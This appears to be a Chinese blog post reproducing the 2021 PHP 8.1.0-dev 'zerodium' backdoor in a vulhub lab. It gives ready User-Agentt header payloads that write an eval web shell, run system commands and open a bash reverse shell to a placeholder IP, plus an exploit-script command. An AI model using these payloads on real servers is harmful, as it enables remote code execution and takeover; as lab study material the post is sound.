PHP 8.1.0-dev后门复现

最新推荐文章于 2024-05-15 00:20:00 发布
最新推荐文章于 2024-05-15 00:20:00 发布
阅读量1.8k 收藏 5
点赞数
文章标签: php android 开发语言
原文链接:https://mp.weixin.qq.com/s?__biz=MzAwNzkzMzYzMg==&mid=2247484548&idx=1&sn=21ed869fa73a8648c7dfd30ca1ec7117&chksm=9b77df2bac00563d21a35e72a0476e856315291b522c986dc5b12ccfc2092c84eb8923fe8376&scene=126&&sessionid=0
版权

0x01 简介

PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。

0x02 影响版本

PHP 8.1.0-dev

0x03 环境搭建

使用vulhub进行搭建: 

cd vulhub/php/8.1-backdoor
sudo docker-compose up -d

访问主页:

http://ip:8080

44cafcda5b25d2879494863f5358a55e.png

0x04 漏洞复现

后门存在于user-agentt:zerodium字段,后面加上相应的php函数,得到执行结果:

2f548e1c3780f242325828795b1ed2b8.png

我们再来查看phpinfo(),通过浏览器插件Modify Header,点击Open options page,修改该网站的Headers:

55ec4873cd1bbcaed5e6b7a57934bed7.png

221140c8cbc854428235dad86916a3ad.png

30daf5a5af99c0f0dc0abb5674135e4a.png

再来执行写入shell:

User-Agentt: zerodiumfile_put_contents('indes.php','<?php eval($_POST["xx11"]);?>');

a30c40ac035bf1d7efa2a25ea1b7cf37.png

连接成功:

75c11996f7cc107b414955879463dead.png

执行命令:

User-Agentt: zerodiumsystem("id");

0a27086c5aaed3d3e4279a4917e19f32.png

反弹shell:

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/IP/8000 0>&1'");

82fbc02607dad6b8b7c392829315d5a6.png

EXP:

python3 PHP-8.1.0-dev-Backdoor-RCE.py -u http://ip:8080 -c id

89ec81e5e60916fac733367f34085e28.png

exp后台回复php-8.1.0-dev获取。

0x05修复建议

1、建议更换版本

长按下方图片关注我们:

2dc4658b80f5ca5b13500de979294004.jpeg

xju_lr
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-8.1.0-dev 后门命令执行漏洞复现
m0_48520508的博客
06-16 2132
0x00漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 0x01影响范围 PHP 8.1.0-dev 0x02环境搭建 1、本次环境搭建使用vulhub中的docker环境搭建,vulhub环境下载地址: https://github.com/vulhub/vulhub 2、下载完成后发送到安装有docker和docker-compose环境的虚拟机中,进入漏洞环境目录 c
2、PHP 8.1.0-dev 后门远程命令执行漏洞复现
最新发布
weixin_51520483的博客
05-20 491
3、bp抓包发现PHP版本为8.1.0-dev。4、尝试使用以前爆出过的漏洞(网上查相关案例)1、青少年ctf,题目PHP后门
【CTF Web】QSNCTF PHP后门 Writeup(PHP 8.1.0-dev 后门远程命令执行漏洞)
HEX9CF的技术博客
05-15 334
题目描述PHP竟然也会有后门这种东西?你知道吗!
PHP-8.1.0-dev 后门命令执行漏洞复现_zerodiumvar_dump
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-26 607
如果你也想学习:黑客&网络安全的SQL攻防。
PHP/8.1.0-dev 后门命令执行漏洞复现
m0_63253040的博客
09-25 1689
题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了。没有发现什么点,目录扫描也没有结果,打开bp抓包。搜索PHP/8.1.0-dev
PHP 8.1.0-dev 开发版本后门事件
黑白的博客
05-11 5527
声明 好好学习,天天向上 漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 影响范围 PHP 8.1.0-dev 复现过程 这里使用8.1版本 使用vulhub /app/vulhub/vulhub-master/php/8.1-backdoor 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 h
青少年CTF、PHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1930
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
最新版windows mysql-8.1.0-winx64.zip
08-02
最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip
i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z
06-30
MinGW-W64的32位安装包:i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z ,支持GCC8.1.0,线程模型为posix,异常处理模型为dwarf, 解压后即可使用。 mingw-w64 版本选择方法: 32位系统选择i686, 64位系统选择x86_...
i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z
08-06
MinGW-W64的32位安装包:i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z支持GCC8.1.0, 解压后即可使用。 利用下载工具下载的也是此压缩包,然后解压缩而已。 方便没梯子的!!!!
x86_64-8.1.0-release-win32-seh-rt_v6-rev0.rar
11-14
标题 "x86_64-8.1.0-release-win32-seh-rt_v6-rev0.rar" 暗示了这是一个针对x86_64架构的编译器或开发环境的下载包,版本号为8.1.0,并且是针对Windows 32位系统(尽管它本身是64位程序)的,具有结构化异常处理...
MinGW(x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)
03-24
这个压缩包“x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z”包含了MinGW针对x86_64架构的64位版本,版本号为8.1.0。让我们深入了解MinGW以及这个特定版本包含的内容。 首先,GCC是GNU项目的核心组成部分,它支持...
PHP zerodium后门漏洞
good good study
05-18 6878
目录 一. 漏洞概述 二. 漏洞影响 三. 漏洞复现 一. 漏洞概述 PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。 目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitH
php-8.1.0 开发后门复现
lionwerson的博客
06-02 604
1
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 408
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1246
漏洞介绍 关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-devPHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
PHP 8.1.0-dev 开发版本后门复现
Jaky5320的博客
05-31 309
0x00:简介    PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。0x01:搭建环境https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor然后访问本地地址http://127.0.0.1:8080/0x02:漏洞复现神秘代码#!/usr/bin/env python3 im
mingw-w64-x86-64-v8.1.0-win32-seh
07-28
mingw-w64-x86-64-v8.1.0-win32-seh是一种用于Windows操作系统的编译器工具集。它是基于gcc的最新版本,并且针对64位的x86架构进行了优化。这个工具集使用了Windows的结构化异常处理(SEH)机制,可以在程序遇到异常时提供更好的处理和调试能力。 mingw-w64-x86-64-v8.1.0-win32-seh可以用于开发和编译各种类型的应用程序,包括命令行工具、图形界面应用以及动态链接库(DLL)。它提供了一系列的工具和库,如编译器、链接器、调试器等,可以帮助开发人员进行代码的编写、构建和调试。 使用mingw-w64-x86-64-v8.1.0-win32-seh进行开发有以下几个优点。首先,它遵循GNU开发工具链的标准,可以轻松地在不同平台之间进行移植。其次,它支持C、C++和Fortran等多种编程语言,可以满足不同项目的需求。此外,它提供了丰富的库和头文件,方便开发人员调用和使用现有的功能。最后,使用mingw-w64-x86-64-v8.1.0-win32-seh编译的程序具有较高的性能和较小的文件尺寸。 总之,mingw-w64-x86-64-v8.1.0-win32-seh是一个强大而灵活的编译器工具集,可以帮助开发人员在Windows平台上进行高效的应用程序开发和调试。无论是个人项目还是商业项目,使用它都能够提高开发效率和代码质量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值